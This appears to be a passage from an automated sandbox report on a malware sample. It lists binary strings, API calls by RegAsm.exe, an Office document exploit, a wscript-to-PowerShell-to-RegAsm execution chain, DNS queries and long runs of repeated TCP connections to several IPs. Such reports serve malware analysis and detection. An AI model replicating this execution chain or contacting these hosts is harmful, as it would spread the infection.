                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407877 FindFirstFileW,FindNextFileW,14_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044E8F9 FindFirstFileExA,14_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Suspicious execution chain found
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: ia803104.us.archive.org
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
